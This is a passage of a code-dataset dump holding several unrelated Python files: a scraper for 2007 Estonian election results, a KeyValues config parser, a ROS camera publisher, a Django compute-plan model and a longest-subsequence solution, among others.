np.array(result)\n\n\ndef apply_median_filter(data):\n result = []\n for i in range(data.shape[0]):\n result.append([])\n for j in range(data.shape[1]):\n result[i].append(get_median(data, i, j))\n return np.array(result)\n\n\ndef get_mean(data, i, j):\n aux = [data[i, j]]\n if is_valid_position(data, i - 1, j):\n aux.append(data[i - 1, j])\n if is_valid_position(data, i + 1, j):\n aux.append(data[i + 1, j])\n\n return np.mean(np.array(aux))\n\n\ndef get_median(data, i, j):\n aux = [data[i, j]]\n if is_valid_position(data, i - 1, j):\n aux.append(data[i - 1, j])\n if is_valid_position(data, i + 1, j):\n aux.append(data[i + 1, j])\n\n return np.median(np.array(aux))\n\n\ndef is_valid_position(data, i, j):\n return 0 <= i < data.shape[0] and 0 <= j < data.shape[1]\n","repo_name":"ealmuina/thesis","sub_path":"clusterapp/features/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"22811102058","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n\nimport random\nimport requests\nimport bs4\nimport string\nimport csv\nimport json\nimport time\nimport re\nimport bisect\n\nimport roman\n\nj=0\n\ndists = {}\n\nurls = []\n\ncand_norm = []\ncand_ext = {}\n\nfor i in range(1,4):\n urls.append((\"http://vvk.ee/varasemad/r07/tulemus/10%d0000.html\") % i)\n\nfor i in range (2,11):\n urls.append((\"http://vvk.ee/varasemad/r07/tulemus/%d000000.html\") % i)\n \nfor url in urls:\n j+=1\n #if j>10: break\n \n #print(url)\n succ = 1\n while succ > 0:\n try:\n page = requests.get(url)\n page.encoding = page.apparent_encoding\n succ = 0\n except requests.exceptions.RequestException as e:\n print(e)\n succ += 1\n time.sleep(succ)\n \n #print(page.text)\n #exit(1)\n \n soup = bs4.BeautifulSoup(page.text, 'lxml')\n x = soup.find_all(\"table\")[8]\n distnr = int(str(x.find(\"span\", {\"class\", \"head\"})).split(\"Valimisringkond nr \")[1].split(\"<\")[0])\n tr = x.find_all(\"table\")[2].find_all(\"tr\")\n kvoot = None\n run = False\n head = []\n for z in tr:\n ddd = z.find_all(\"td\")\n ht = ddd[0].text.strip()\n if not run:\n if ht != \"I\": continue\n else: run = 1\n print(roman.toRoman(run), \"?=\", ht)\n if roman.toRoman(run) == ht:\n head.append({\n \"nr\": run,\n \"altnr\": ht,\n \"title\": ddd[1].text.strip()\n }\n )\n if len(ddd[2].text.strip())>0:\n head[-1][\"eligible\"] = int(ddd[2].text.strip())\n if len(ddd[3].text.strip())>0:\n head[-1][\"votes\"] = int(ddd[3].text.strip())\n run += 1\n \n print(run, z)\n print(\"------\")\n\n print(head)\n\n kvoot = tr[-1].text.strip()\n #print(kvoot)\n #ehstring = soup.find(\"div\", {\"class\", \"dataTableWrap\"}).text.split(\"E-hääled\")[0].split(\" \")[-1]\n dists[distnr] = {\"m\": int(kvoot.split(\"/\")[1].split(\"=\")[0].strip()), \"arr\": head, \"c\": {}}\n #print(distnr, kvoot)\n\n dist = soup.find_all(\"table\")[8].find_all(\"table\")\n\n #print(dist)\n# ringkond = dist[0].text.split(\" \")[-1]\n# candname = soup.find_all(\"span\", {\"class\", \"uppercase\"})\n# nimi = candname[0].text.title()\n\n dist.remove(dist[0])\n dist.remove(dist[0])\n dist.remove(dist[0])\n\n #heads = []\n\n #table = dist[0].find('tbody')\n #print(table)\n #hhh = table.find_all(\"td\")\n #for h in hhh:\n # heads.append(h.text)\n\n #print(heads[-1], ehstring)\n\n #exit(1)\n \n for di in dist:\n table = di.find(name='tbody')\n rrr = di.find_all(\"tr\")\n rows = 0\n party = \"\"\n for r in rrr:\n if rows == 0:\n ddd = r.find_all(\"td\")\n party = ddd[0].text.strip().upper()\n rows +=1\n continue\n #print(r)\n if r.text.find(\"Nimekiri KOKKU\") < 0 and r.text.find(\"Üksikkandidaadid KOKKU\") < 0:\n #print(r)\n td = 0\n res = []\n ddd = r.find_all(\"td\")\n if len(ddd) < 3:\n #print(ddd)\n rows=0\n continue\n else:\n #print(ddd)\n print(ddd[1].text, ddd[2].text, ddd[4].text, ddd[-1].text)\n\n cand_norm.append(\n {\n \"number\": int(ddd[1].text),\n \"name\": ddd[2].text,\n \"votes\": int(ddd[4].text.replace(\"=\",\"\").replace(\" \",\"\")),\n \"electronic\": int(ddd[-1].text.replace(\"+\",\"\").replace(\" \",\"\")),\n \"district\": distnr,\n \"party\": party\n }\n )\n\n cand_ext[int(ddd[1].text)] = {\n \"number\": int(ddd[1].text),\n \"name\": ddd[2].text,\n \"votes\": int(ddd[4].text.replace(\"=\",\"\").replace(\" \",\"\")),\n \"electronic\": int(ddd[-1].text.replace(\"+\",\"\").replace(\" \",\"\")),\n \"district\": distnr,\n \"party\": party,\n \"arr\": []\n }\n \n ce = cand_ext[int(ddd[1].text)][\"arr\"]\n kokku = int(ddd[4].text.replace(\"=\",\"\").replace(\" \",\"\"))\n \n hc = 0\n for arr in head:\n ce.append({\n \"title\": arr[\"title\"],\n \"nr\": arr[\"nr\"],\n \"altnr\": arr[\"altnr\"],\n \"votes\": int(ddd[6+hc*2].text.replace(\"+\",\"\").replace(\" \",\"\"))\n })\n hc += 1\n #if \"eligible\" in arr:\n # ce[arr[\"title\"]][\"e\"] = arr[\"eligible\"]\n \n if party not in dists[distnr][\"c\"]:\n dists[distnr][\"c\"][party] = [cand_norm[-1][\"number\"]]\n else:\n bisect.insort(dists[distnr][\"c\"][party], cand_norm[-1][\"number\"])\n \n res.append(ddd[1].text)\n res.append(ddd[2].text)\n res.append(kokku)\n res.append(ddd[-3].text.replace(\"+\",\"\").replace(\" \",\"\"))\n res.append(ddd[-1].text.replace(\"+\",\"\").replace(\" \",\"\"))\n with open('rk2007-tulemused.csv', 'a') as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow(res)\n csv_file.close()\n\nprint(cand_ext)\n\nwith open(\"res2007.json\", 'w') as outfile:\n json.dump(cand_norm, outfile, sort_keys=True, indent=4)\n \nwith open(\"res2007-ext.json\", 'w') as outfile:\n json.dump(cand_ext, outfile, sort_keys=True, indent=4)\n\nwith open(\"dists2007.json\", 'w') as outfile:\n json.dump(dists, outfile, sort_keys=True, indent=4)\n","repo_name":"infoaed/rk2007-data","sub_path":"tul2.py","file_name":"tul2.py","file_ext":"py","file_size_in_byte":6123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73416112833","text":"\"\"\"\npNEUMA package to work with dataset of pNEUMA experiment\n\nAuthor: Landtmeters Joachim, KU Leuven\nData source: pNEUMA – open-traffic.epfl.ch\n\"\"\"\nimport os\nfrom pathlib import Path\nimport pickle\n\nfrom .settings import *\nfrom ._api import *\n\n# Folders to store intermediate results and data sets\n# Created in working directory of run python script\n# In future versions decisions on how to handle best with intermediate data and results will be made\nresults_folder = 'results'\ndata_folder = 'data'\nPath(os.getcwd()+\"/\"+data_folder).mkdir(parents=True, exist_ok=True)\nPath(os.getcwd()+\"/\"+results_folder + \"/plots\").mkdir(parents=True, exist_ok=True)\nPath(os.getcwd()+\"/\"+results_folder + \"/crossings\").mkdir(parents=True, exist_ok=True)\nPath(os.getcwd()+\"/\"+data_folder + \"/shapefiles\").mkdir(parents=True, exist_ok=True)\nPath(os.getcwd()+\"/\"+results_folder + \"/case_studies\").mkdir(parents=True, exist_ok=True)\nPath(os.getcwd()+\"/\"+results_folder).mkdir(parents=True, exist_ok=True)\n\n# Folders to store intermediate results and data sets\npath_data = os.path.join(os.getcwd(), data_folder)\npath_results = os.path.join(os.getcwd(), results_folder)\npath_case_studies = os.path.join(os.getcwd(), results_folder, 'case_studies')\n\n\ndef write_pickle(obj, filename, path=None):\n if path is None:\n path = os.getcwd()\n filename = os.path.join(path, filename)\n filename = os.path.normpath(filename)\n with open(filename, 'wb') as a:\n pickle.dump(obj, a)\n\n\ndef read_pickle(filename, path=None):\n if path is None:\n path = os.getcwd()\n filename = os.path.join(path, filename)\n filename = os.path.normpath(filename)\n with open(filename, 'rb') as a:\n obj = pickle.load(a)\n return obj\n\n\n","repo_name":"JoachimLandtmeters/pNEUMA_mastersproject","sub_path":"pneumapackage/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"61"} +{"seq_id":"5177966449","text":"from pathlib import Path\n# https://sourcegraph.com/github.com/TheAlePower/TeamFortress2@1b81dded673d49adebf4d0958e52236ecc28a956/-/blob/tf2_src/tier1/KeyValues.cpp?L2388:17\n\n# note, support chained key values? (ChainKeyValue)\n# maybe keep track of line numbers so we can sneak new values in better?\nWS = \" \\t\\n\\r\"\n\nfrom model.util import ResDict\n\n\nclass Buf:\n def __init__(self, st):\n self.st = st\n\n def is_valid(self):\n while 1:\n if all(c in WS for c in self.st):\n return False\n\n self.eat_white_space()\n\n if (not self.eat_cpp_comment()) \\\n and (not self.eat_brackets()):\n break\n\n if len(self.st) == 0:\n return False\n\n return True\n\n def peek(self):\n return self.st[0]\n\n def eat_one_char(self):\n self.st = self.st[1:]\n\n def eat_white_space(self):\n i = 0\n while self.st[i] in WS:\n i += 1\n\n self.st = self.st[i:]\n\n def eat_cpp_comment(self):\n if len(self.st) < 2:\n return False\n\n c1, c2 = self.st[0], self.st[1]\n if c1 != \"/\" or c2 != \"/\":\n return False\n\n self.eat_until(\"\\n\")\n self.eat_one_char()\n return True\n\n def eat_brackets(self):\n c = self.st[0]\n if c != \"[\":\n return False\n\n self.eat_one_char()\n self.eat_until(\"]\")\n assert self.st[0] == \"]\"\n self.eat_one_char()\n return True\n\n def eat_until(self, cs):\n # ret does not include the end character\n # but st does\n if self.st == '':\n return ''\n i = 0\n length = len(self.st) - 1 \n\n while i < length and self.st[i] not in cs:\n i += 1\n\n cap = self.st[:i]\n self.st = self.st[i:]\n return cap\n\n def get_deliminited_string(self):\n assert self.st[0] == '\"'\n self.st = self.st[1:]\n\n s = self.eat_until('\"')\n assert self.st[0] == '\"'\n self.eat_one_char()\n #return '\"' + s + '\"'\n return s\n\n\nclass Parser:\n def __init__(self, inputstring, path='', parsed=[]):\n self.path = Path(path) # for base and include\n self.parsed = parsed # for avoiding parsing file twice while following base\n\n self.items = ResDict()\n self.buf = Buf(inputstring)\n self.visited_filenames = []\n self.parse_file()\n\n def get_text(self):\n return self.buf.st\n\n def parse_file(self):\n\n while self.buf.is_valid():\n token, _ = self.read_token()\n if token == \"#include\" or token == \"#base\":\n # include is appended, and base is merged\n # but not sure how those are different so..\n includefile, _ = self.read_token()\n f = (self.path / includefile).resolve()\n if f.is_file() and f not in self.parsed:\n print('parsing ', f)\n # {HERE} Fix infinite looping of parsing\n new_items = parse_file(f.resolve(), parsed=[f, *self.parsed])\n # TODO make sure that it doesn't override\n # values, it keeps oldest ones\n self.items.deep_merge_with(new_items)\n\n else:\n opn, qtd = self.read_token()\n\n\n assert opn == \"{\", opn\n assert not qtd\n\n res = ResDict()\n res[token] = self.recursive_parse_file()\n\n self.items.deep_merge_with(res)\n\n\n def recursive_parse_file(self):\n # parse until closing block, returning dict of pairs\n items = ResDict()\n while 1:\n key, qtd = self.read_token()\n\n if key == \"}\" and not qtd:\n return items\n\n if key == \"{\" and not qtd:\n raise Exception(\"two { in a row\")\n\n value, qtd = self.read_token()\n\n if value == \"{\" and not qtd:\n items[key] = self.recursive_parse_file()\n else:\n items[key] = value\n\n def read_token(self):\n # eat whitespace/comments\n while 1:\n self.buf.eat_white_space()\n\n if (not self.buf.eat_cpp_comment()) \\\n and (not self.buf.eat_brackets()):\n break\n\n c = self.buf.peek()\n if c == '\"':\n token = self.buf.get_deliminited_string()\n return token, True\n elif c == \"{\" or c == \"}\":\n self.buf.eat_one_char()\n return c, False\n\n token = self.buf.eat_until(WS + '}{')\n return token, False\n # TODO handle conditionals []\n\n\ndef parse_file(fname, parsed=[]):\n path = Path(fname).resolve().parent\n with open(fname) as f:\n return Parser(f.read(), path, parsed=parsed).items\n","repo_name":"tommy-mor/hudmixer","sub_path":"src/model/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":4829,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"10607868575","text":"#!/usr/bin/env python\nimport rospy\nimport numpy as np\nimport cv2, sys, time, math\nfrom sensor_msgs.msg import Image\nfrom sensor_msgs.msg import CompressedImage\nfrom cv_bridge import CvBridge\n\nif __name__ == '__main__':\n rospy.init_node('pi_floorcam_node', anonymous=True)\n cap = cv2.VideoCapture(0)\n pub = rospy.Publisher(\n '/pi_floorcam/image_raw/compressed', CompressedImage, queue_size=3)\n rate = rospy.Rate(10)\n\n bridge = CvBridge()\n while not rospy.is_shutdown():\n ret, frame = cap.read()\n msg = CompressedImage()\n msg.format = \"jpeg\"\n msg.data = np.array(cv2.imencode('.jpg', frame)[1]).tostring()\n #publish new image\n pub.publish(msg)\n #pub.publish(bridge.cv2_to_imgmsg(frame, \"bgr8\"))\n\n cv2.waitKey(100) #wait for input(ms)\n\n cap.release()\n","repo_name":"bkjung/hengel_ros","sub_path":"hengel_visual_odometry/scripts/pi_floorcam_publisher.py","file_name":"pi_floorcam_publisher.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27493958909","text":"import secrets\nimport string\n\nimport structlog\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.db.models import Count\nfrom django.db.models import Q\n\nfrom api.models.computetask import ComputeTask\n\nlogger = structlog.get_logger(__name__)\n\n\ndef _get_or_create_deleted_user() -> User:\n user_deleted, created = User.objects.get_or_create(username=settings.VIRTUAL_USERNAMES[\"DELETED\"], is_active=False)\n if created:\n password = \"\".join(\n (secrets.choice(string.ascii_letters + string.digits + string.punctuation) for _ in range(24))\n )\n user_deleted.set_password(password)\n user_deleted.save()\n\n return user_deleted\n\n\nclass ComputePlan(models.Model):\n \"\"\"ComputePlan represent a compute plan and its associated metadata\"\"\"\n\n class Status(models.TextChoices):\n PLAN_STATUS_WAITING = \"PLAN_STATUS_WAITING\"\n PLAN_STATUS_TODO = \"PLAN_STATUS_TODO\"\n PLAN_STATUS_DOING = \"PLAN_STATUS_DOING\"\n PLAN_STATUS_DONE = \"PLAN_STATUS_DONE\"\n PLAN_STATUS_CANCELED = \"PLAN_STATUS_CANCELED\"\n PLAN_STATUS_FAILED = \"PLAN_STATUS_FAILED\"\n PLAN_STATUS_EMPTY = \"PLAN_STATUS_EMPTY\"\n\n key = models.UUIDField(primary_key=True)\n owner = models.CharField(max_length=100)\n status = models.CharField(max_length=64, choices=Status.choices, default=Status.PLAN_STATUS_EMPTY)\n tag = models.CharField(max_length=100, blank=True)\n name = models.CharField(max_length=100)\n creator = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n on_delete=models.SET(_get_or_create_deleted_user),\n related_name=\"compute_plans\",\n null=True,\n )\n creation_date = models.DateTimeField()\n cancelation_date = models.DateTimeField(null=True)\n start_date = models.DateTimeField(null=True)\n end_date = models.DateTimeField(null=True)\n metadata = models.JSONField(null=True)\n failed_task_key = models.CharField(max_length=100, null=True)\n channel = models.CharField(max_length=100)\n\n class Meta:\n ordering = [\"creation_date\", \"key\"] # default order for relations serializations\n\n def _add_failed_task(self) -> None:\n if self.failed_task_key is not None:\n # failed_task field is already populated\n return\n\n first_failed_task = (\n self.compute_tasks.filter(end_date__isnull=False, status=ComputeTask.Status.STATUS_FAILED)\n .order_by(\"end_date\")\n .first()\n )\n\n if first_failed_task is None:\n return\n\n self.failed_task_key = first_failed_task.key\n\n def get_task_stats(self) -> dict:\n return ComputeTask.objects.filter(compute_plan__key=str(self.key)).aggregate(\n task_count=Count(\"key\"),\n done_count=Count(\"key\", filter=Q(status=ComputeTask.Status.STATUS_DONE)),\n waiting_count=Count(\"key\", filter=Q(status=ComputeTask.Status.STATUS_WAITING)),\n todo_count=Count(\"key\", filter=Q(status=ComputeTask.Status.STATUS_TODO)),\n doing_count=Count(\"key\", filter=Q(status=ComputeTask.Status.STATUS_DOING)),\n canceled_count=Count(\"key\", filter=Q(status=ComputeTask.Status.STATUS_CANCELED)),\n failed_count=Count(\"key\", filter=Q(status=ComputeTask.Status.STATUS_FAILED)),\n )\n\n def update_status(self) -> None:\n \"\"\"Compute cp status from tasks counts.\"\"\"\n stats = self.get_task_stats()\n if stats[\"task_count\"] == 0:\n compute_plan_status = self.Status.PLAN_STATUS_EMPTY\n elif stats[\"done_count\"] == stats[\"task_count\"]:\n compute_plan_status = self.Status.PLAN_STATUS_DONE\n elif stats[\"failed_count\"] > 0:\n compute_plan_status = self.Status.PLAN_STATUS_FAILED\n elif self.cancelation_date or stats[\"canceled_count\"] > 0:\n compute_plan_status = self.Status.PLAN_STATUS_CANCELED\n elif stats[\"waiting_count\"] == stats[\"task_count\"]:\n compute_plan_status = self.Status.PLAN_STATUS_WAITING\n elif stats[\"waiting_count\"] < stats[\"task_count\"] and stats[\"doing_count\"] == 0 and stats[\"done_count\"] == 0:\n compute_plan_status = self.Status.PLAN_STATUS_TODO\n else:\n compute_plan_status = self.Status.PLAN_STATUS_DOING\n\n logger.debug(\n \"update cp status\",\n status=compute_plan_status,\n task_count=stats[\"task_count\"],\n done_count=stats[\"task_count\"],\n waiting_count=stats[\"waiting_count\"],\n todo_count=stats[\"todo_count\"],\n doing_count=stats[\"done_count\"],\n canceled_count=stats[\"canceled_count\"],\n failed_count=stats[\"doing_count\"],\n )\n\n self.status = compute_plan_status\n\n if self.status == self.Status.PLAN_STATUS_FAILED:\n self._add_failed_task()\n\n self.save()\n\n def update_dates(self) -> None:\n \"\"\"Update start_date, end_date\"\"\"\n\n if not self.start_date:\n first_started_task = self.compute_tasks.filter(start_date__isnull=False).order_by(\"start_date\").first()\n if first_started_task:\n self.start_date = first_started_task.start_date\n\n ongoing_tasks = self.compute_tasks.filter(end_date__isnull=True).exists()\n failed_or_canceled_tasks = self.compute_tasks.filter(\n status__in=(\n ComputeTask.Status.STATUS_FAILED,\n ComputeTask.Status.STATUS_CANCELED,\n )\n ).exists()\n\n if self.cancelation_date is not None:\n self.end_date = self.cancelation_date\n elif ongoing_tasks and not failed_or_canceled_tasks:\n # some tasks could remain in waiting status without end date\n self.end_date = None # end date could be reset when cp is updated with new tasks\n else:\n last_ended_task = self.compute_tasks.filter(end_date__isnull=False).order_by(\"end_date\").last()\n if last_ended_task:\n self.end_date = last_ended_task.end_date\n\n self.save()\n","repo_name":"Substra/substra-backend","sub_path":"backend/api/models/computeplan.py","file_name":"computeplan.py","file_ext":"py","file_size_in_byte":6091,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"61"} +{"seq_id":"39542495802","text":"from pathlib import Path\nimport json\n\nall_glosses = []\n\nfor file in Path('./hillmari_multimedia').iterdir():\n if not file.name.endswith('.json'):\n continue\n doc = json.load(file.open(encoding='utf-8'))\n for sent in doc['sentences']:\n for word in sent['words']:\n if 'ana' in word:\n for ana in word['ana']:\n all_glosses.extend(ana.get('gloss_index_ru', '').split('-'))\n\nall_glosses = [x[:x.index('{') if '{' in x else len(x)].strip(' {}') for x in all_glosses]\n\nprint(json.dumps([{\"type\": \"gloss\", \"value\": gloss, \"tooltip\": gloss} for gloss in sorted(set(all_glosses))], ensure_ascii=False))\n","repo_name":"vantral/hillmari_backup","sub_path":"corpus/script_2.py","file_name":"script_2.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39788321581","text":"#!/usr/bin/python3\n\nfrom datetime import datetime\n\n# Open and read the file\n#filename = input(\"input filename: \")\n#csvfile = open(filename, 'r').read()\n\ndef parse(csvtext):\n # Split the file into rows/items\n lines = csvtext.split('\"\\n\"')\n fulllines = []\n for line in lines:\n fulllines += [line.split('\",\"')]\n\n # Delete extra characters\n del fulllines[0]\n fulllines[-1][-1] = fulllines[-1][-1][:-2]\n\n # Parse raw CSV data into name, area/s, room/s, start time, end time\n events = []\n for neweventraw in fulllines:\n # Create new event as dictionary\n newevent = {}\n newevent['name'] = neweventraw[0]\n newevent['areas'] = [neweventraw[1]]\n newevent['rooms'] = [neweventraw[2]]\n newevent['start'] = datetime.strptime(neweventraw[3], '%I:%M%p - %A %d %B %Y')\n newevent['end'] = datetime.strptime(neweventraw[4], '%I:%M%p - %A %d %B %Y')\n\n # Merge with existing event in case of multiple rooms\n adding = True\n for event in events:\n if [event['name'], event['start'], event['end']] == [newevent['name'], newevent['start'], newevent['end']]:\n adding = False\n if newevent['areas'][0] not in event['areas']:\n event['areas'] += newevent['areas']\n if newevent['rooms'][0] not in event['rooms']:\n event['rooms'] += newevent['rooms']\n break\n\n # Add event if not merging\n if adding:\n events += [newevent]\n\n # Sort events by start time\n events = sorted(events, key = lambda i: i['start'])\n\n return events\n","repo_name":"AidanRB/mrbs_print","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26932300353","text":"'''\r\nQ1514. Description: You are given an undirected weighted graph of n nodes (0-indexed), represented by an edge list where edges[i] = [a, b] is an undirected edge connecting the nodes a and b with a probability of success of traversing that edge succProb[i].\r\n\r\nGiven two nodes start and end, find the path with the maximum probability of success to go from start to end and return its success probability.\r\n\r\nIf there is no path from start to end, return 0. Your answer will be accepted if it differs from the correct answer by at most 1e-5.\r\n'''\r\n\r\nclass Solution:\r\n def maxProbability(self, n: int, edges: List[List[int]], succProb: List[float], start: int, end: int) -> float:\r\n graph = defaultdict(list)\r\n\r\n for i, (a,b) in enumerate(edges):\r\n graph[a].append([b, succProb[i]])\r\n graph[b].append([a, succProb[i]])\r\n \r\n # Set max probability of reaching a node to 0\r\n max_prob = [0.0] * n\r\n max_prob[start] = 1.0\r\n\r\n queue = deque([start])\r\n # Search for path using all neighbouring nodes\r\n while queue:\r\n cur_node = queue.popleft()\r\n\r\n for nxt_node, path_prob in graph[cur_node]:\r\n # Update probability only if current path increases\r\n if max_prob[cur_node] * path_prob > max_prob[nxt_node]:\r\n max_prob[nxt_node] = max_prob[cur_node] * path_prob\r\n queue.append(nxt_node)\r\n\r\n return max_prob[end]","repo_name":"aditi-govindu/LeetCode-DSA","sub_path":"JuneChallenge_2023/PathMaximumProbability.py","file_name":"PathMaximumProbability.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2140302719","text":"import numpy as np\n\ndef get_cell_next_state(row, col, board): \n cell = board[row][col]\n live_neigh = get_live_neighbors(row, col, board)\n if cell == 0:\n if live_neigh == 3:\n return 1\n else:\n return 0\n else:\n if live_neigh == 2 or live_neigh == 3:\n return 1\n else: \n return 0\n\n\ndef get_live_neighbors(row, col, board): \n neighbors = []\n for i in range(row-1, row+2):\n for j in range(col-1, col+2):\n neighbors = np.append(neighbors, board[i][j])\n neighbors = np.delete(neighbors, 4)\n return np.sum(neighbors)","repo_name":"karolina-cz/Game-of-life-parallel","sub_path":"cell_utils.py","file_name":"cell_utils.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30783581551","text":"import sys\nfrom io import IOBase, BytesIO\nfrom os import read, write, fstat\nfrom typing import List, Tuple\nfrom copy import deepcopy\n################################################################################\n\"\"\"Обертка для быстрого ввода/вывода\"\"\"\n\nBUFSIZE = 8192\n\n\nclass FastIO(IOBase):\n newlines = 0\n\n def __init__(self, file):\n self._fd = file.fileno()\n self.buffer = BytesIO()\n self.writable = \"x\" in file.mode or \"r\" not in file.mode\n self.write = self.buffer.write if self.writable else None\n\n def read(self):\n while True:\n b = read(self._fd, max(fstat(self._fd).st_size, BUFSIZE))\n if not b:\n break\n ptr = self.buffer.tell()\n self.buffer.seek(0, 2), self.buffer.write(b), self.buffer.seek(ptr)\n self.newlines = 0\n return self.buffer.read()\n\n def readline(self, size: int = ...):\n while self.newlines == 0:\n b = read(self._fd, max(fstat(self._fd).st_size, BUFSIZE))\n self.newlines = b.count(b\"\\n\") + (not b)\n ptr = self.buffer.tell()\n self.buffer.seek(0, 2), self.buffer.write(b), self.buffer.seek(ptr)\n self.newlines -= 1\n return self.buffer.readline()\n\n def flush(self):\n if self.writable:\n write(self._fd, self.buffer.getvalue())\n self.buffer.truncate(0), self.buffer.seek(0)\n\n\nclass IOWrapper(IOBase):\n def __init__(self, file):\n self.buffer = FastIO(file)\n self.flush = self.buffer.flush\n self.writable = self.buffer.writable\n self.write = lambda s: self.buffer.write(s.encode(\"ascii\"))\n self.read = lambda: self.buffer.read().decode(\"ascii\")\n self.readline = lambda: self.buffer.readline().decode(\"ascii\")\n\n\nstdin, stdout = IOWrapper(sys.stdin), IOWrapper(sys.stdout)\n\n\ndef split_input():\n return stdin.readline().split()\n\n\ndef _input():\n return stdin.readline()\n################################################################################\n\n\ndef longest_subsequence(size: int, sequence: List[int]) -> Tuple[int, List[int]]:\n \"\"\"Возвращает длину наибольшей возрастающей подпоследовательности и саму подпоследовательность\"\"\"\n dynamic = [None] * size\n ancestors = dynamic[:]\n dynamic[0] = 1\n ancestors[0] = -1\n\n for i in range(1, size):\n dynamic[i], ancestors[i] = max((dynamic[j] + 1, j) if sequence[j] < sequence[i] else (1, -1) for j in range(i))\n\n subs_idx, subs_length = max(enumerate(dynamic), key=lambda x: x[1])\n\n subsequence = [sequence[subs_idx]]\n while ancestors[subs_idx] != -1:\n idx = ancestors[subs_idx]\n elm = sequence[idx]\n subsequence.append(elm)\n subs_idx = ancestors[subs_idx]\n subsequence.reverse()\n\n return subs_length, subsequence\n\n\ndef main() -> None:\n \"\"\"Считывание, обработка, вывод\"\"\"\n size = int(_input())\n sequence = [int(x) for x in split_input()]\n subs_length, subsequence = longest_subsequence(size, sequence)\n ans = str(subs_length) + \"\\n\" + \" \".join(map(str, subsequence))\n stdout.write(ans)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ZingyKizz/MADE","sub_path":"algo/6/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27691867584","text":"import re\nimport enchant\nimport json\n\nprevInChain=0\nbraceCount=0\ncommentBlock=[]\nencModel=enchant.Dict(\"en_US\")\n\nwith open('featureConfig.json') as data_file: \n\tconf = json.load(data_file)\n\nkeywords= conf[\"keywords\"]\noperatorList= conf[\"operatorList\"]\ncommentSingle= conf[\"commentSingle\"]\ncommentMultiple= conf[\"commentMultiple\"]\ndataFile= conf[\"dataFile\"]\n#self.commentDict= conf[\"commentDict\"]\n\ncommentDict={}\nfor cS in commentSingle:\n\tcommentDict[cS]=0\nfor cM in commentMultiple:\n\tcommentDict[cM[0]]=1\n\ndef ratioK(s):\n\tsW=[ele for ele in re.split(\"[^A-Za-z0-9_$]\",s) if ele!=\"\"]\t\n\tl=len(sW)\n\tc=0.0\n\tfor ele in sW:\n\t\tif ele in keywords:\n\t\t\tc+=1\n\tif float(l)!=0.0:\n\t\treturn c/l\n\treturn 0.0\n\ndef operators(s):\n\t#operatorList=[\"+\",\"-\",\"*\",\"/\",\"^\",\"%\",\">\",\"<\",\"=\"]\t#set\n\tfor ele in operatorList:\n\t\tif ele in s:\n\t\t\treturn 1.0\n\treturn 0.0\n\ndef comments(s):\n\tglobal commentBlock\n\t# commentSingle=[\"//\"]\t#set\n\t# commentMultiple=[[\"/*\",\"*/\"],[\"/**\",\"*/\"]]\t#set\n\t# commentDict={\"//\":0,\"/*\":1,\"/**\":1}\n\tif commentBlock!=\"\":\n\t\tfor ele in commentMultiple:\n\t\t\tif ele[0]==commentBlock:\n\t\t\t\tif ele[1] in s:\n\t\t\t\t\tcommentBlock=\"\"\n\t\treturn 1.0\n\telse:\n\t\tcIndex=9999\n\t\tcValue=-1\n\t\tfor k,v in commentDict.items():\n\t\t\tif k in s and cIndex>s.index(k):\n\t\t\t\tcIndex=s.index(k)\n\t\t\t\tcValue=v\n\t\tif cValue==0:\n\t\t\treturn 1.0\n\t\telif cValue==1:\n\t\t\tfor ele in commentMultiple:\n\t\t\t\tif ele[0] in s:\n\t\t\t\t\tif ele[1] not in s:\n\t\t\t\t\t\tcommentBlock=ele[0]\n\t\t\treturn 1.0\n\t\telse:\n\t\t\treturn 0.0\n\treturn 0.0\n\ndef braces(s):\n\tglobal braceCount\n\ttmp=0\n\tif \"{\" in s:\n\t\tbraceCount+=1\n\tif braceCount>0:\n\t\ttmp=1\n\tif \"}\" in s:\n\t\tbraceCount-=1\n\treturn float(tmp)\n\ndef indent(s):\n\tif s[0]==\" \" or s[0]==\"\\t\":\n\t\treturn 1.0\n\treturn 0.0\n\ndef semicolon(s):\n\tif s[:-1]==\";\":\n\t\treturn 1.0\n\treturn 0.0\n\ndef programChain():\n\tglobal prevInChain\n\tif prevInChain==1:\n\t\tprevInChain=0\n\t\treturn 1.0\n\treturn 0.0\n\ndef capital(s):\n\tfor i in s:\n\t\tif i==\" \" or i==\"\\t\":\n\t\t\tcontinue\n\t\telse:\n\t\t\tif i>=\"a\" and i<=\"z\":\n\t\t\t\treturn 1.0\n\t\t\treturn 0.0\n\ndef ratioC(s):\n\tsW=[ele for ele in re.split(\"[^A-Za-z0-9_$]\",s) if ele!=\"\" and ele not in keywords]\t\n\tl=len(sW)\n\tc=0.0\n\tfor ele in sW:\n\t\tif encModel.check(ele):\n\t\t\tc+=1\n\tif 